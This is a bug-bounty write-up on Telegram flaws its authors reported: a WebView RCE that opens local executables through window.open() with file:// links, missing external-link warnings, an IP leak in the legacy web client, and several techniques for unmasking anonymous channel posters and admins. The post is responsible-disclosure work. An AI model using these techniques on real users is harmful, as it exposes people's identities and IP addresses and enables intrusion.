Summary
- RCE via WebView (May 2022)
- WebK and WebZ, no warning appears when opening external links (May 2021)
- IP leak Telegram Web (old version) (May 2021)
- Leak users behind anonymous channel posts (December 2021)
Intro
In Italy, we have pizza, pasta, and people looking for bugs. Today I want to talk about some bugs we’ve found through the years in Telegram.
- Davide
- A friend who prefers to remain anonymous
RCE via WebView
Introduction
As every month Telegram releases an update, and in that month the Web Apps for bots on Telegram came out, we immediately decided to test the new feature on the various clients offered by Telegram, and we were able to run any executable already on the computer by simply opening a site with the WebView.
Web Apps for Bots
Telegram recently introduced Web Apps for Bots (https://telegram.org/blog/notifications-bots#bot-revolution), thus allowing a browser to be used within Telegram, what could possibly go wrong?
On the day of the release itself, we immediately created a bot and implemented the new functionality to make a site open via the WebView, and we tried something very simple to start with, we tested opening links via protocols other than http, such as file:// sftp:// ssh:// smb://, using the various methods provided by javascript, such as window.replace() and window.open(), and to our surprise, after a short time, we found ourselves being able to execute a file locally.
Exactly one hour since we started reading the documentation, we found an RCE and through this simple code, it was possible to open any executable already on the computer with Windows 10.
Testing the exploit on multiple platforms
This was all great, and it was time to test the exploit on multiple clients and different operating systems.
On Android and IOS, we did some testing but nothing happened to the apps that were much more limited than in a traditional desktop environment.
We tried on Linux, no result, nothing opened, we tried on Windows 11, nothing here either, on Windows 7 it worked instead.
Unfortunately, the source code had not yet been released so we did not know why on Windows 10 and 7 it worked while on 11 it did not, good thing that a few days after the release the source code was also updated.
And so we discovered that edgechromium (webview2) was being run on Win11 while edgehtml was being used on Win10 and lower.
A few days after our report to Telegram, they fixed it by checking that external links are only http[s] and removing edgehtml.
Then we tried it on macOS, and to our surprise it not only worked on the tdesktop client, which is the one that runs on Windows, macOS, and Linux, but also on the macOS-specific client, which is TelegramSwitft.
Several months after the feature was released, they finally released the updated source for the macOS client.
Trying to improve the exploit
Okay, the exploit worked on Win7, Win10, and macOS, and now?
But opening already installed programs wasn’t enough for us, we wanted to do more, we couldn’t even run something automatically downloaded from Telegram Desktop in the downloads folder, because we couldn’t get the user’s name and because environment variables didn’t work.
We tried running some additional parameters for cmd to try to take control of the machine, but again without success.
We were able, however, to open links using other protocols, such as calculator: which opened calculator on Windows, smb:// and ssh:// worked but you couldn’t do much with it, maybe, we could have exploited samba with pass the hash, but we didn’t test since that was not our goal.
Also on macOS before they could run anything they would pop up asking the user for permission, so again, nothing really exploitable.
In short, an RCE is found with a simple window.open() but unfortunately or perhaps I should say, fortunately, not very useful without other exploits.
Conclusion
We reported the problem to the Telegram Team and it was acknowledged, they also fixed it, and now WebView, on Windows and Mac are more secure.
WebK and WebZ, no warning appears when opening external links
There is not much to say about this bug, simply the opening of the links on the two new Telegram web clients occurred without alerting the user that they were leaving Telegram, so a phishing attack would have been much easier to carry out, especially being web clients.
Instead on all the other clients, there is a popup warning you, even on the old web client.
IP leak (old) Telegram Web
Intro
Through the old web client, it is possible to get a person’s IP by having them use an inline bot.
Discovery
Many years ago there was a bug on Telegram that allowed an inline bot to take a user’s IP because the thumbnail of the photo was downloaded from the client and was not proxied by Telegram as it was for the full-resolution photo.
It was a bug discovered by I don’t know who, it was popular around the various Telegram groups I reported it to Telegram volunteer support (and not directly to security@telegram.org) a long time ago, almost every client had this bug and I wasn’t paid for it, back in the day I didn’t even think about asking if there was a bounty, plus I hadn’t even discovered the bug, I had only managed to reproduce it.
Years later though I tried it again and apparently for some reason, it was never fixed on the Telegram web, or it was reintroduced by mistake, this time though I decided to report it by email to security.
They have confirmed the bug and paid a bounty, however, as the client is now deprecated it has not been fixed; simply don’t use the old Telegram web client!
But if you’re really sure you want to try the old client, I won’t be the one to stop you, so here’s the link: https://web.telegram.org/?legacy=1
Leak users behind anonymous channel posts
There are several ways to figure out who is behind a channel writing as a user.
Some of these methods also work with anonymous admins.
1. Using an inline bot
Even just by opening an inline bot for a moment (for example by pressing a button with switch_inline_query and choosing a chat), the bot will be aware of the user who used the bot, obviously to be sure that it is the anonymous user it should be done in so that the user sends a message with that bot inline.
Alternatively, make sure no one else is using the bot.
2. Users who viewed the message
This method only works with users who write as a channel but does not work with anonymous admins, just open the menu to see the users who have viewed the message.
Obviously, you can’t be sure in this case, and you may already see users from the chat list.
But it can help figure out who owns the channel.
3. Pressing a button of a bot (the inline buttons, those attached to the message)
By pressing an inline button the bot receives all the user’s info, it works both for anonymous admins and writing as a channel.
To understand who the anonymous admin is, you can take the list of users of the group and wait for the only user not in the list to press the button.
Again you can’t be 100% sure, but in some borderline cases, you might understand it, as you might have false positives.
4. Without the internet and restarting the app (android)
The messages are all sent as normal, but the client shows them as if I were sending them as a channel
Steps to reproduce:
- Set the primary user to write in the chat
- Go offline
- Set the channel to write in the chat
- Send messages
- Set the primary user to write in the chat
- Close the app
- Open the app
5. Game bot (like @gamee)
The score with your name is shown if you are posting as a channel and playing.
It does not happen for anonymous admins.
I have not had the opportunity to test what data the bot receives, but I imagine it receives all the user data in both cases, in addition to the IP address.
6. Join a group call
It only works for writing as a channel and not for anonymous admins
7. Change the group photo or pin a message
The service notification appears with the user’s name
It only works for writing as a channel and not for anonymous admins
8. Poll
There is not much to say in this case, as long as a user votes in a non-anonymous poll and you will see the user among the voters.
It is a very simple thing, but a user may not think about it and the app does not protect him in any way, while he thinks he is anonymous.
I understand that half of the things are almost irrelevant and they are so by design, however by calling them “anonymous” a person expects to be more protected, a warning before taking certain actions (even if it only appears once) I think is a good solution
As it already happens in secret chats, it warns you before using an inline bot.
Conclusion
Some of these “bugs” were fixed by Telegram, but I never received a response.
I think Telegram should make a page on the site dedicated to bug bounty, writing what they consider in scope for bug bounty and what they pay more for, as they have paid a lot in the past for bugs such as p2p calls that were used by default and leaked the user’s IP (duh).
Want to read about other bugs?
Go take a look at our previous article:
Telegram bug bounties: XSS, privacy issues, official bot exploitation and more…
